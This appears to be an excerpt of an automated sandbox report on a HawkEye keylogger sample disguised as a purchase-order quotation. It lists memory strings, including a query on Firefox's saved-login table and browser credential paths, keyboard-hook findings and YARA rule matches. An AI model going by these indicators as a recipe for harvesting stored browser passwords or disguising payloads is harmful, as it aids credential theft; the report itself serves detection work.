              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: WindowsUpdate.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: vbc.exe, 00000003.00000003.245528532.00000000008BC000.00000004.00000001.sdmpString found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login. equals www.facebook.com (Facebook)
              Source: vbc.exe, 00000003.00000003.245528532.00000000008BC000.00000004.00000001.sdmpString found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login. equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: whatismyipaddress.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.222007881.000000001F12D000.00000004.00000001.sdmpString found in binary or memory: http://en.w
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
              Source: WindowsUpdate.exe, 00000008.00000002.308158001.000000001CC12000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312377035.000000001CCB1000.00000004.00000001.sdmpString found in binary or memory: http://foo.com/fooT
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com
              Source: WindowsUpdate.exeString found in binary or memory: http://whatismyipaddress.com/
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.224519756.000000001F137000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223535347.000000001F138000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223629764.000000001F138000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com.12
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223629764.000000001F138000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comItaf
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223629764.000000001F138000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comeci
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223535347.000000001F138000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comitk.
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223629764.000000001F138000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comypo
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317281962.000000001F120000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp, PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.228030667.000000001F12D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.228030667.000000001F12D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersB
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317281962.000000001F120000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317281962.000000001F120000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comceco
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.222855521.000000001F152000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn(
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.222855521.000000001F152000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnBm
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.222855521.000000001F152000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnxmQ
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.227248438.000000001F12F000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
              Source: WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: WindowsUpdate.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: WindowsUpdate.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Yara detected HawkEye KeyloggerShow sources
              Source: Yara matchFile source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 4848, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 6328, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO 2010029_pdf Quotation from Alibaba Ale.exe PID: 2148, type: MEMORY
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPE
              Contains functionality to log keystrokes (.Net Source)Show sources
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.cs.Net Code: HookKeyboard
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.cs.Net Code: HookKeyboard
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, Form1.cs.Net Code: HookKeyboard
              Installs a global keyboard hookShow sources
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,2_2_0040AC8A
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.301871315.000000000164A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
